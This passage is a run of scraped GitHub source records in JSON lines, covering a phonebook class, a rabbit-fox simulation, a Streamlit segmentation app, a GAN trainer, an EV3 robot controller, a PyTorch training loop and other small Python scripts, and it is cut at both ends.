owner.\n number: The actual phone number of the owner.\n\n Returns:\n Returns \"Edit successful!\" when a contact is edited\n with no issues.\n Returns an error message, \"No such contact!\" if the contact in\n question is not in the phonebook.\n\n \"\"\"\n\n try:\n number = int(number)\n except TypeError:\n raise(TypeError)\n except ValueError:\n raise(ValueError)\n # prevent accidental addition of new contacts by letting user know\n # if a contact is new.\n if number in self.data.keys():\n self.data[number] = [firstname, surname]\n return(\"Edit successful!\")\n else:\n return(\"No such contact!\")\n\n def view(self):\n \"\"\"This function retrieves all existing contacts.\n\n Args:\n Takes no arguments.\n\n Returns:\n Returns all contacts in a dictionary format.\n\n \"\"\"\n return(self.data)\n\n def delete(self, number):\n \"\"\"Function for deleting contacts from the phonebook instance.\n\n Args:\n number: The contact number to be deleted.\n\n Returns:\n Returns \"Contact deleted!\" when a contact is deleted\n with no issues.\n Returns an error message, \"No such contact!\" if the\n if the contact did not exist on delete request.\n\n \"\"\"\n\n try:\n number = int(number)\n except TypeError:\n raise(TypeError)\n except ValueError:\n raise(ValueError)\n # Check for existence before deletion.\n if number in self.data.keys():\n del self.data[number]\n return(\"Contact deleted!\")\n else:\n return(\"No such contact!\")\n","repo_name":"JoshuaOndieki/contacts","sub_path":"models/phonebook.py","file_name":"phonebook.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"25301242633","text":"\"\"\"\n\n\"\"\"\n\n# make sure to import things that you need...\n\ndef main():\n\timport math\n\t# rbr is the rabbit birth rate without predation \n\trBr = 0.01\n\n\t# fbr is the fox birth rate when no rabbits are available \n\tfBr = 0.005\n\n\t# interaction is the likelihood that a rabbit and fox will meet\n\tI = 0.00001\n\n\t# hunt is the likelihood that when a fox & rabbit meet that the fox catches\n\t# the rabbit\n\tS = 0.01\n\t\n\t# rabbits is the current rabbit population\n\tr = int(input(\"\\nPlease enter the initial rabbit population: \"))\n\n\t# foxes is the current fox population \n\tf = int(input(\"Please enter the initial foxes 
population: \"))\n\n\t# num_days is the number of days to run the simulation\n\tnumD = int(input(\"Please enter the number of days to run the simulation: \"))\n\t\n\t# display_freq is how often to display results in the table, does not impact calculations\n\t#\tdisplay always starts with initial populations\n\tdisplayFreq = int(input(\"Please enter the frequency of days for displaying data: \"))\n\n\t# this code sets up two lists to contain the populations from the rounding calculations\n\t#\tthe first values in the list are the starting populations entered by the user \n\trR = [r]\n\trF = [f]\n\trRabbitsAvg = 0\n\trFoxesAvg = 0\n\t\n\tfR = [r]\n\tfF = [f]\n\tfRabbitsAvg = 0\n\tfFoxesAvg = 0\n\t\n\tcR = [r]\n\tcF = [f]\n\tcRabbitsAvg = 0\n\tcFoxesAvg = 0\n\t\n\tflR = [r]\n\tflF = [f]\n\tflRabbitsAvg = 0\n\tflFoxesAvg = 0\n\t\n\t\n\t# Perform all of the population calculations in this loop\n\t# The new population values get appended to their corresponding lists \n\tfor i in range(0, numD + 1):\n\t\t# pass keeps Python from generating an error without any code in the loop\n\t\t# You can remove it or leave it\n\t\tpass\n\t\t\n\t\t# compute the new number of rabbits and foxes for the day and round the result\n\t\tchangeR = round(rBr * rR[i] - I * rR[i] * rF[i])\n\t\tchangeF = round(I * S * rR[i] * rF[i] - fBr * rF[i])\n\t\t\n\t\trR.append(rR[i] + changeR)\n\t\trF.append(rF[i] + changeF)\n\n\t\t# compute the new number of rabbits and foxes for the day and take the ceiling of result\n\t\tchangeR = math.floor(rBr * fR[i] - I * fR[i] * fF[i])\n\t\tchangeF = math.floor(I * S * fR[i] * fF[i] - fBr * fF[i])\n\t\t\n\t\tfR.append(fR[i] + changeR)\n\t\tfF.append(fF[i] + changeF)\n\t\t\n\t\t# compute the new number of rabbits and foxes for the day and take the floor of result\n\t\tchangeR = math.ceil(rBr * cR[i] - I * cR[i] * cF[i])\n\t\tchangeF = math.ceil(I * S * cR[i] * cF[i] - fBr * cF[i])\n\t\t\n\t\tcR.append(cR[i] + changeR)\n\t\tcF.append(cF[i] + changeF)\n\t\t\t\t\n\t\t# compute the new number of rabbits and foxes for the day and leave as a fraction\n\t\tchangeR = float(rBr * flR[i] - I * flR[i] * flF[i])\n\t\tchangeF = float(I * S * flR[i] * flF[i] - fBr * flF[i])\n\t\t\n\t\tflR.append(flR[i] + changeR)\n\t\tflF.append(flF[i] + changeF)\n\t\t\n\t\n\t# calculate all of the averages\n\tfor i in range(0, numD + 1):\n\t\trRabbitsAvg = rR[i] + rRabbitsAvg\n\t\trFoxesAvg = rF[i] + rFoxesAvg\n\t\t\n\t\tfRabbitsAvg = fR[i] + fRabbitsAvg\n\t\tfFoxesAvg = fF[i] + fFoxesAvg\n\t\t\n\t\tcRabbitsAvg = cR[i] + cRabbitsAvg\n\t\tcFoxesAvg = cF[i] + cFoxesAvg\n\t\t\n\t\tflRabbitsAvg = flR[i] + flRabbitsAvg\n\t\tflFoxesAvg = flF[i] + flFoxesAvg\n\t\t\n\trRabbitsAvg = rRabbitsAvg/(numD + 1)\n\trFoxesAvg = rFoxesAvg/(numD + 1)\n\t\n\tfRabbitsAvg = fRabbitsAvg/(numD + 1)\n\tfFoxesAvg = fFoxesAvg/(numD + 1)\n\t\n\tcRabbitsAvg = cRabbitsAvg/(numD + 1)\n\tcFoxesAvg = cFoxesAvg/(numD + 1)\n\t\n\tflRabbitsAvg = flRabbitsAvg/(numD + 1)\n\tflFoxesAvg = flFoxesAvg/(numD + 1)\n\t\n\t\n\t# print out the averages\n\t# Here is how to do this for the rounding version\n\t#\twill display a zero for both values until the calculations are completed\n\tprint(\"\\nRounded Population Averages:\")\n\tprint(\"{:9s}{:>10.3f}\".format(\"Rabbits:\", rRabbitsAvg))\n\tprint(\"{:9s}{:>10.3f}\".format(\"Foxes:\", rFoxesAvg))\n\tprint(\"\\nFloor Population Averages:\")\n\tprint(\"{:9s}{:>10.3f}\".format(\"Rabbits:\", fRabbitsAvg))\n\tprint(\"{:9s}{:>10.3f}\".format(\"Foxes:\", fFoxesAvg))\n\tprint(\"\\nCeiling Population 
Averages:\")\n\tprint(\"{:9s}{:>10.3f}\".format(\"Rabbits:\", cRabbitsAvg))\n\tprint(\"{:9s}{:>10.3f}\".format(\"Foxes:\", cFoxesAvg))\n\tprint(\"\\nRaw Population Averages:\")\n\tprint(\"{:9s}{:>10.3f}\".format(\"Rabbits:\", flRabbitsAvg))\n\tprint(\"{:9s}{:>10.3f}\".format(\"Foxes:\", flFoxesAvg))\n\t\n\t\n\t\n\t\n\t\n\t# print out Table Heading\n\t# Here is a version you can use as a guide. You don't have to keep it setup this way. \n\tprint()\n\t\n\tdisplayStr = \"{:<10s}{:^20s}{:^19s}{:^20s}{:^29s}\".format(\n\t\"\", \"Rounded Values\", \"Floor Values\", \"Ceil Values\", \"Raw Values\")\n\tprint(displayStr)\n\t\n\tdisplayStr = \"{:>10s}{:>10s}{:>10s}{:>10s}{:>10s}{:>10s}{:>10s}{:>15s}{:>15s}\".format(\n\t\t\"Day\", \"Rabbits\", \"Foxes\", \"Rabbits\", \"Foxes\", \"Rabbits\", \"Foxes\", \"Rabbits\", \"Foxes\")\n\tprint(displayStr)\n\t\n\tprint(\"-\" * 100)\n\t\t\n\t# create a for-loop to print out the values using the frequency that the user specified\n\t#\tbe sure to use string formatting to make everything line up nicely\n\tfor j in range(0, numD + 1, displayFreq):\n\t\tdisplayStr = \"{:>10}{:>10}{:>10}{:>10}{:>10}{:>10}{:>10}{:>15.3f}{:>15.3f}\".format(j, rR[j], rF[j], fR[j], fF[j], cR[j], cF[j], flR[j], flF[j])\n\t\tprint(displayStr)\n\t\n\t\n\tprint()\n\t\nmain()\n","repo_name":"Mekeda/CSCI-1300-Introduction-to-Programming","sub_path":"Assingment 4.5/Oh_Milbrandt_assignment4_5.py","file_name":"Oh_Milbrandt_assignment4_5.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30506290558","text":"import streamlit as st\nimport torch\nfrom transformers import SegformerForSemanticSegmentation, SegformerImageProcessor\nimport os\nfrom dataset_and_aug import ImageSegmentationDataset\nfrom torch import nn\nfrom model_plot import get_img_seg, prob_and_name_in_bbox\nimport numpy as np\nimport cv2\n\n\ndef build_model():\n \"\"\"\n Initialize/load model weights\n :return: pretrained model\n \"\"\"\n input_path = os.getcwd()\n best_model_name = 'continue/checkpoint-4400'\n\n # load model from checkpoint\n model = SegformerForSemanticSegmentation.from_pretrained(\n os.path.join(input_path, best_model_name))\n\n return model\n\n\ndef predict(image):\n \"\"\"\n perform initialize model -> find_relevant_region -> predict -> merge img and seg -> draw helpful info\n :param image: input image\n :return: result segmented image\n \"\"\"\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = build_model()\n model = model.to(device)\n coordinates_roi = x, y, w, h = ImageSegmentationDataset.find_relevant_region(image) # find cargo\n\n # crop image for better performance\n crop_image = image[y:y + h, x:x + w]\n\n # select feature extractor\n feature_extractor_inference = SegformerImageProcessor(do_random_crop=False, do_pad=False, do_reduce_labels=False)\n pixel_values = feature_extractor_inference(crop_image, return_tensors=\"pt\").pixel_values.to(device)\n model.eval()\n outputs = model(pixel_values=pixel_values) # logits are of shape (batch_size, num_labels, height/4, width/4)\n logits = outputs.logits.cpu()\n\n # First, rescale logits to original image size\n upsampled_logits = nn.functional.interpolate(logits,\n size=crop_image.shape[::][:-1], # (height, width)\n mode='bilinear',\n align_corners=False)\n\n # Second, apply argmax on the class dimension\n classes_in_crop_segmentation_map = upsampled_logits.argmax(dim=1)[0]\n probability_in_crop_segmentation = 
upsampled_logits.softmax(dim=1)[0] # probability tensor [channel, width, height]\n\n original_segmentation_size = np.zeros((image.shape[0], image.shape[1]), dtype=np.uint8)\n original_segmentation_size[y:y + h, x:x + w][:] = classes_in_crop_segmentation_map[:, :]\n\n segmentation_and_image = get_img_seg(image, original_segmentation_size) # second image+ segmentation\n\n res_img, contours, label_xy_list, conf_i_class_list = prob_and_name_in_bbox(segmentation_and_image, classes_in_crop_segmentation_map,\n probability_in_crop_segmentation, coordinates_roi)\n print(f'number are polygons = {len(contours)}')\n print(f'number points = {len(contours[0])}')\n print(contours[0][-1][0])\n return res_img\n\n\ndef convert_image(img):\n \"\"\"\n Save final segmented image for download_button\n :param img: image\n :return: bytes image\n \"\"\"\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.imencode('.jpeg', img)[1].tobytes()\n return img\n\n\ndef fix_image(image, name_image):\n \"\"\"\n Main page\n :param image: input image\n :param name_image: for download_button\n :return:\n \"\"\"\n col1.write(\"Original Image :camera:\")\n col1.image(image)\n fixed = predict(image)\n col2.write(\"Fixed Image :sparkles:\")\n col2.image(fixed)\n st.sidebar.markdown(\"\\n\")\n st.sidebar.download_button(label=\"Download fixed image\",\n data=convert_image(fixed),\n file_name=f\"{name_image}\",\n mime=\"image/jpeg\")\n\n\nif __name__ == \"__main__\":\n st.set_page_config(layout=\"wide\", page_title=\"Segformer segmentation Maksim\")\n st.write(\"# Find items from your image\")\n st.write(\n \"Test page to view result model\"\n )\n st.sidebar.write(\"## Upload and download :gear:\")\n\n col1, col2 = st.columns(2)\n my_upload = st.sidebar.file_uploader(label=\"Upload an image\",\n type=[\"png\", \"jpg\", \"jpeg\"])\n\n if my_upload is not None:\n file_bytes = np.asarray(bytearray(my_upload.read()), dtype=np.uint8)\n opencv_image = cv2.imdecode(file_bytes, 1)\n opencv_image = cv2.cvtColor(opencv_image, cv2.COLOR_BGR2RGB)\n name_image = my_upload.name\n fix_image(opencv_image, name_image)\n else:\n default_img = \"/home/maksim/PycharmProjects/pythonProject/data/cargo_segform_train=0.8val=0.2/train/images\" \\\n \"/81_.jpeg\"\n name_image = '81_'\n opencv_image = cv2.imread(default_img)\n opencv_image = cv2.cvtColor(opencv_image, cv2.COLOR_BGR2RGB)\n fix_image(opencv_image, name_image)\n # streamlit run segformer_model/streamlit_app.py\n","repo_name":"MaximKondakov/SegFormer","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16544784222","text":"from dao import taskdao\nimport dbconnect\ntaskid=1028\ntaskname='add'\ndescription='preksha'\nstatus='completed'\npriority=1\nnotes='notes 1'\nbookmark='bookm13'\nownerid=115\ncreatorid=213\ncreatedon='2021-02-03'\nmodifiedon='2021-02-14'\n#creating obj with para\n#tsk = taskdao.task.Task(taskid, taskname, description, status, priority, notes, bookmark, ownerid, creatorid, createdon,modifiedon)\n#taskdao.run(tsk)#passing obj as param\ndbconnect.search(1028)","repo_name":"preethi-nraju/Python-Exercise","sub_path":"pythoncasestudy/mainfile.py","file_name":"mainfile.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26069797213","text":"import matplotlib as mpl\nmpl.use('Agg')\nimport numpy as np\nimport 
matplotlib.pyplot as plt\nimport bayesian as ba\nimport read_emcee_samples as res\nimport standard_gwtransf as gw\n\ndef calc_conf_intervals_in_1d(P, x):\n\n # find the value of P corresponding to 68% and 95% confidence heights \n P_s1 = ba.nsigma_value(P, 0.5)\n P_s2 = ba.nsigma_value(P, 0.9)\n\n # calculation of condifence edges (values of x corresponding to the height s1 on the two sides) \n x_s1_l = min(x[np.where(P >= P_s1)[0]])\n x_s1_r = max(x[np.where(P >= P_s1)[0]])\n\n # calculation of condifence edges (values of x corresponding to the height s2 on the two sides) \n x_s2_l = min(x[np.where(P >= P_s2)[0]])\n x_s2_r = max(x[np.where(P >= P_s2)[0]])\n\n return P_s1, P_s2, x_s1_l, x_s1_r, x_s2_l, x_s2_r\n\n##################################################\n# MAIN\n##################################################\n\nin_dir_root = '../runs/9_param_runs/Mc_q_deltaMc_diffM'\nburnin = 1000\n\nM_inj_list = [20,40,60,80,100,120,140,160,180,200]#40\nq_inj = 9#[1,1.5,2,3,4,5,6,7,8,9]#9\niota_inj_list = [30, 45, 60, 80, 90]\n\nout_matrix = np.zeros([len(M_inj_list), len(iota_inj_list)+1])\n\nfor (i, M_inj) in enumerate(M_inj_list):\n for (j, iota_inj) in enumerate(iota_inj_list):\n\n #if q_inj == 1.5:\n #\tpost_loc = in_dir_root + '/M_40_q_1.5_iota_%d/emcee_samples.dat'%(iota_inj)\n #else:\n post_loc = in_dir_root + '/M_%d_q_9_iota_%d/emcee_samples.dat'%(M_inj, iota_inj)\n nwalkers, num_iter, ndim = 100, 3000, 11\n n_burnin = 1000\n mc, q, mc1, q1, dL, iota, t0, phi0, ra, sin_dec, pol = res.read_emcee_samples(post_loc, nwalkers, num_iter, ndim, n_burnin)\n x, x1 = mc, mc1 \n\n eta_inj = gw.eta_from_q(q_inj)\n mc_inj = gw.mc_from_toteta(M_inj, eta_inj)\n dxbyx_1d = (x[burnin:] - x1[burnin:])/mc_inj\n\n Nbins = 101\n dxbyx_bins = np.linspace(min(dxbyx_1d), max(dxbyx_1d), Nbins)\n dxbyx = np.mean(np.diff(dxbyx_bins))\n dxbyx_intp = (dxbyx_bins[:-1] + dxbyx_bins[1:])/2.\n\n P_dxbyx_1d, dxbyx_bins = np.histogram(dxbyx_1d,bins=dxbyx_bins, normed=True)\n\n s1_1d, s2_1d, left1_1d, right1_1d, left2_1d, right2_1d = calc_conf_intervals_in_1d(P_dxbyx_1d, dxbyx_intp)\n\n out_matrix[i, 0] = M_inj\n out_matrix[i, j+1] = right2_1d-left2_1d\n\nnp.savetxt('../data/90_percent_width_9dim_DeltaMcbyMcinj_diffM_abhi.txt', out_matrix, header='M i_30 i_45 i_60 i_80 i_90')\n","repo_name":"abhirup-ghosh/gr_consistency_highermodes","sub_path":"scripts/compute_90percent_CI.py","file_name":"compute_90percent_CI.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71488419664","text":"#!/usr/bin/python3\nfrom sys import argv\nif __name__ == '__main__':\n if len(argv) == 1:\n print(\"0\")\n else:\n counter = 0\n for i in range(1, len(argv)):\n pk = int(argv[i])\n counter += pk\n print(\"{}\".format(counter))\n","repo_name":"Peterkays/alx-higher_level_programming","sub_path":"0x02-python-import_modules/3-infinite_add.py","file_name":"3-infinite_add.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39042661238","text":"\"\"\"\nYour task is to return the sum of Triangular Numbers up-to-and-including\nthe nth Triangular Number.\n\nTriangular Number: \"any of the series of numbers (1, 3, 6, 10, 15, etc.)\nobtained by continued summation of the natural numbers 1, 2, 3, 4, 5, etc.\"\n\"\"\"\n\"\"\"\ndef sum_triangular_numbers(n):\n return n*(n+1)*(n+2)/6 if n>0 else 0\n\"\"\"\n\n\ndef sum_triangular_numbers(n):\n result = 
[]\n counter = 0\n for i in range(1, n + 1):\n result.append(0.5 * i * (i+1))\n return sum(result)\n","repo_name":"rodandr13/codewars-python","sub_path":"7kyu/Sum_of_Triangular_Numbers.py","file_name":"Sum_of_Triangular_Numbers.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"22933093061","text":"from django.urls import path\n\nfrom .views import (\n home, product_detail, CreateProduct,\n UpdateProduct, DeleteProduct, ProductList, search,\n ContactView, delete_product\n)\n\napp_name = \"product\"\nurlpatterns = [\n path('///', product_detail, name='product-detail'),\n path('update//', UpdateProduct.as_view(), name=\"update-product\"),\n # path('delete//', DeleteProduct.as_view(), name=\"delete-product\"),\n path('delete//', delete_product, name=\"delete-product\"),\n path('list/', ProductList.as_view(), name=\"product_list\"),\n path('search/', search, name=\"search\"),\n path('create/', CreateProduct.as_view(), name='create-product'),\n path('contact/', ContactView.as_view(), name='contact'),\n path('', home, name='home'),\n]\n","repo_name":"patrice012/ecommerce","sub_path":"product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"43515975213","text":"import chainer.functions as F\nimport chainer.optimizers as optimizers\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom tqdm import tqdm\n\nimport networks\nfrom Model import Model\nfrom utils import get_mnist, RandomIterator\n\n\ndef train():\n\tdiscriminative_optimizer = optimizers.SGD()\n\tdiscriminative_optimizer.setup(discriminative_net)\n\n\tgenerative_optimizer = optimizers.SGD()\n\tgenerative_optimizer.setup(generative_net)\n\n\tloss_disc = []\n\tloss_gen = []\n\tfor _ in tqdm(range(n_iter)):\n\t\tloss_disc_current = 0\n\t\tloss_gen_current = 0\n\t\tfor data in train_iter:\n\t\t\n\t\t\tx_real = data\n\t\t\tt_real = discriminative_net(x_real)\n\n\t\t\tgen_input = np.float32(np.random.uniform(size=(batch_size, 1)))\n\t\t\tx_fake = generative_net(gen_input)\n\t\t\tt_fake = discriminative_net(x_fake)\n\n\t\t\t# Backprop\n\t\t\tgenerative_loss = F.softmax_cross_entropy(t_fake, np.ones(shape=(batch_size), dtype=np.int32))\n\t\t\tdiscriminative_loss = F.softmax_cross_entropy(t_fake, np.zeros(shape=(batch_size), dtype=np.int32))\n\t\t\tdiscriminative_loss += F.softmax_cross_entropy(t_real, np.ones(shape=(batch_size), dtype=np.int32))\n\t\t\tdiscriminative_loss /= 2\n\t\t\t\n\t\t\tgenerative_net.cleargrads()\n\t\t\tgenerative_loss.backward() # recompute the grads\n\t\t\tgenerative_optimizer.update()\n\n\t\t\tdiscriminative_net.cleargrads()\n\t\t\tdiscriminative_loss.backward()\n\t\t\tdiscriminative_optimizer.update()\n\n\t\t\tloss_disc_current += discriminative_loss.data\n\t\t\tloss_gen_current += generative_loss.data\n\n\t\tloss_gen.append(loss_gen_current/train_iter.idx)\n\t\tloss_disc.append(loss_disc_current/train_iter.idx)\n\n\tplt.plot(loss_disc, label=\"Discriminator Loss\")\n\tplt.plot(loss_gen, label=\"Generator Loss\")\n\tplt.legend()\n\tplt.ylabel(\"Loss\")\n\tplt.xlabel(\"Epoch\")\n\tplt.show()\n\tfor i in range(4):\n\t\tgen_input = np.float32(np.random.uniform(size=[1, 1]))\n\t\tgeneration = generative_net(gen_input) # we need to keep the variable type around, to compute stuff\n\n\t\tplt.imshow(np.reshape(generation.data, newshape=[28, 28]).transpose())\n\t\tplt.show()\n\n\nif __name__ 
== \"__main__\":\n\tn_iter = 500\n\tbatch_size = 50\n\ttrain_data, test_data = get_mnist(n_train=1000, n_test=100, with_label=False, classes=[0], n_dim=3)\n\ttrain_iter = RandomIterator(train_data, batch_size)\n\ttest_iter = RandomIterator(test_data, batch_size)\n\n\tdiscriminative_net = networks.DiscriminativeMLP(n_hidden=20)\n\tgenerative_net = networks.GenerativeMLP(n_hidden=200)\n\n\tdiscriminative_net = networks.DiscriminativeConvolutional().to_gpu()\n\tgenerative_net = networks.GenerativeDeconvolutional(256).to_gpu()\n\n\ttrain()\n","repo_name":"dverheijden/Computational-Cognitive-Neuroscience","sub_path":"Practical Assignment 6/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"4671560066","text":"#!/usr/bin/env python3\n\nimport json\nimport time\n\nfrom ev3dev import ev3\nfrom messages.server import Device\n\nfrom brick import Brick\nimport status\n\nHORIZONTAL_SOCKET = 0\nHORIZONTAL_SPEED = 360\nHORIZONTAL_SPEED_FOR_SCANNING = 60\n\nTOUCH_SENSOR_LEFT_ADDRESS = 'in1'\nTOUCH_SENSOR_RIGHT_ADDRESS = 'in2'\n\n# move the robot to the left end when start\n# make sure the touch sensor works or the whole thing will goes wrong\nMOVE_TO_INITIAL_POSITION = False\nSTART_FROM_LEFT = True\nROBOT_LENGTH = 170\nRAILS_LENGTH = 705\n\n\nclass Brick13(Brick):\n\n def __init__(self, brick_id):\n super().__init__(brick_id)\n\n self.horizontal_motor = self.MOTORS[HORIZONTAL_SOCKET]\n\n self.touch_sensor_left = ev3.TouchSensor(address=TOUCH_SENSOR_LEFT_ADDRESS)\n self.touch_sensor_right = ev3.TouchSensor(address=TOUCH_SENSOR_RIGHT_ADDRESS)\n\n print('TouchSensor left connected? ' + str(self.touch_sensor_left.connected))\n print('TouchSensor right connected? ' + str(self.touch_sensor_right.connected))\n print('Stop action set to: ' + self.stop_action)\n\n if MOVE_TO_INITIAL_POSITION:\n if START_FROM_LEFT:\n if str(self.touch_sensor_left.connected):\n print(\"move to very left position in 1 second\")\n time.sleep(1)\n self.move(ROBOT_LENGTH - RAILS_LENGTH, [HORIZONTAL_SOCKET])\n # make sure it will stop\n self.stop_motors([HORIZONTAL_SOCKET])\n\n else:\n print(\"Left touch sensor not ready\")\n\n else:\n if str(self.touch_sensor_right.connected):\n print(\"move to very right position in 1 second\")\n time.sleep(1)\n self.move(RAILS_LENGTH - ROBOT_LENGTH, [HORIZONTAL_SOCKET])\n print(\"get the position,set the position value to \" + str(RAILS_LENGTH - ROBOT_LENGTH))\n # make sure it will stop\n self.stop_motors([HORIZONTAL_SOCKET])\n\n elif str(self.touch_sensor_left.connected):\n print(\"Only left touch sensor is connected\")\n\n else:\n print(\"None of the touch sensors are ready\")\n\n else:\n print(\"Disabled moving to 0 position function\")\n\n def move(self, distance, socket, scanning=False):\n if not self.touch_sensor_left.connected or not self.touch_sensor_right.connected:\n print('Refusing to move: unsafe without touch sensors')\n return\n\n motor = self.horizontal_motor\n if motor.connected:\n # convert to cm and then to deg\n angle = int(self.cm_to_deg(float(distance) / 10))\n if scanning:\n motor.run_to_rel_pos(position_sp=angle, speed_sp=HORIZONTAL_SPEED_FOR_SCANNING, )\n else:\n motor.run_to_rel_pos(position_sp=angle, speed_sp=HORIZONTAL_SPEED, )\n\n else:\n print('Horizontal motor not connected. 
Cannot move')\n\n while not self.motor_ready(motor):\n if distance > 0 and self.touch_sensor_left.is_pressed:\n self.stop_motors([HORIZONTAL_SOCKET])\n print('Reached left edge! Stopping motors')\n self.send_message(socket, status.MESSAGE_LEFT_EDGE)\n # Similarly, we only care about the right sensor if we're moving right\n if distance < 0 and self.touch_sensor_right.is_pressed:\n self.stop_motors([HORIZONTAL_SOCKET])\n print('Reached right edge! Stopping motors')\n self.send_message(socket, status.MESSAGE_RIGHT_EDGE)\n\n if self.touch_sensor_left.is_pressed:\n print('Touch sensor Left PRESSED')\n if self.touch_sensor_right.is_pressed:\n print('Touch sensor Right PRESSED')\n\n print('The motor state is now ' + str(motor.state))\n\n time.sleep(0.1)\n\n def reset_position(self, socket):\n self.move(200000, socket)\n\n def parse_message(self, data, socket):\n print(\"Parse message: \" + data)\n\n json_command = json.loads(data)\n\n command_type = list(json_command.keys())[0]\n command_args = json_command[command_type]\n\n if (command_type == 'horizontal' and len(command_args) == 1 and\n 'amount' in command_args.keys()):\n self.move(command_args['amount'], socket)\n\n elif command_type == 'horizontal_scan' and len(command_args) == 1 and 'amount' in command_args.keys():\n self.move(command_args['amount'], socket, scanning=True)\n\n elif command_type == 'stop':\n if len(command_args) == 1 and ('stop' in command_args.keys()):\n self.stop_motors(command_args['ports'])\n elif len(command_args) == 0:\n self.stop_motors()\n else:\n raise ValueError('Invalid stop command')\n\n elif command_type == status.MESSAGE_RESET_POSITION and len(command_args) == 0:\n self.reset_position(socket)\n\n elif command_type == status.MESSAGE_TOP_EDGE:\n print(\"Hit the TOP touch sensor\")\n\n elif command_type == status.MESSAGE_BOTTOM_EDGE:\n print(\"Hit the BOTTOM touch sensor\")\n\n else:\n raise ValueError('Invalid command')\n\n\nif __name__ == '__main__':\n # Initialize brick\n brick = Brick13(Device.RPI)\n","repo_name":"Battery233/Biblio-tech","sub_path":"brick-13.py","file_name":"brick-13.py","file_ext":"py","file_size_in_byte":5422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70064114382","text":"import torch\nfrom torch.utils.data import DataLoader\nfrom model_ann import ANN\nimport time\n\n\ndef train(device, ds, model=None, nn_config=None):\n DEFAULT_NUM_EPOCHS = 300\n DEFAULT_BATCH_SIZE = 600\n DEFAULT_LEARNING_RATE = 0.001\n DEFAULT_MID_LAYERS = [30, 10]\n torch.manual_seed(0)\n TEST = False\n if nn_config is None:\n nn_config = {\"num_epochs\": DEFAULT_NUM_EPOCHS, \"batch_size\":DEFAULT_BATCH_SIZE,\n \"lr\" : DEFAULT_LEARNING_RATE, \"mid\" : DEFAULT_MID_LAYERS\n }\n num_epochs = nn_config[\"num_epochs\"] if \"num_epochs\" in nn_config else DEFAULT_NUM_EPOCHS\n batch_size = nn_config[\"batch_size\"] if \"batch_size\" in nn_config else DEFAULT_BATCH_SIZE\n lr = nn_config[\"lr\"] if \"lr\" in nn_config else DEFAULT_LEARNING_RATE\n mid = nn_config[\"mid\"] if \"mid\" in nn_config else DEFAULT_MID_LAYERS\n dataloader = DataLoader(ds, batch_size=batch_size, shuffle=True)\n x_size = ds.get_x().shape[1]\n if model is None:\n model = ANN(size = x_size, mid=mid)\n if TEST:\n print(num_epochs, batch_size, lr, mid)\n print(model)\n return model\n model.train()\n model.to(device)\n optimizer = torch.optim.Adam(model.parameters(), lr=lr, weight_decay=0.001)\n criterion = torch.nn.MSELoss(reduction='sum')\n n_batches = int(len(ds)/batch_size) + 1\n 
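    # (clarifying comment) each epoch walks all n_batches minibatches; grads
    # are zeroed right after optimizer.step(), which is equivalent to zeroing
    # them before backward() on the next batch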
batch_number = 0\n loss = None\n start = time.time()\n for epoch in range(num_epochs):\n batch_number = 0\n for (x, y) in dataloader:\n x = x.to(device)\n y = y.to(device)\n y_hat = model(x)\n y_hat = y_hat.reshape(-1)\n loss = criterion(y_hat, y)\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n batch_number += 1\n print(f'Epoch:{epoch + 1} (of {num_epochs}), Batch: {batch_number} of {n_batches}, Loss:{loss.item():.6f}')\n\n return model\n\n#\n# if __name__ == \"__main__\":\n# device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n# train(device)","repo_name":"arf-themascoteers/lucas-visible","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16739395108","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport numpy as np\nimport pandas as pd\nimport datashader as ds\nfrom pyproj import Proj, transform\nfrom datashader.utils import lnglat_to_meters as webm\nfrom functools import partial \nfrom datashader.utils import export_image\nfrom datashader.colors import colormap_select, Greys9\nfrom IPython.core.display import HTML, display\nimport datashader.transfer_functions as tf\n\n\n# In[2]:\n\n\ndf = pd.read_csv(\"/Users/morrow/Documents/Baumkataster_Visualisierung/Baum.csv\", sep=\";\" , decimal=\".\")\n\ndf['Gattung'] = df['Gattung/Art/Deutscher Name'].str.split(',').str[0]\ndf['Deutscher Name'] = df['Gattung/Art/Deutscher Name'].str.split(',').str[1]\ndf['HOCHWERT'] = (df['HOCHWERT'].replace('\\,','.', regex=True).astype(float))\ndf['RECHTSWERT'] = (df['RECHTSWERT'].replace('\\,','.', regex=True).astype(float))\ndf['Kronendurchmesser'] = df['Kronendurchmesser'].replace('\\,','.', regex=True).astype(float)\ndf.head()\n\n\n# In[3]:\n\n\ndf.drop(columns=['Gattung/Art/Deutscher Name'])\n\n\n# In[ 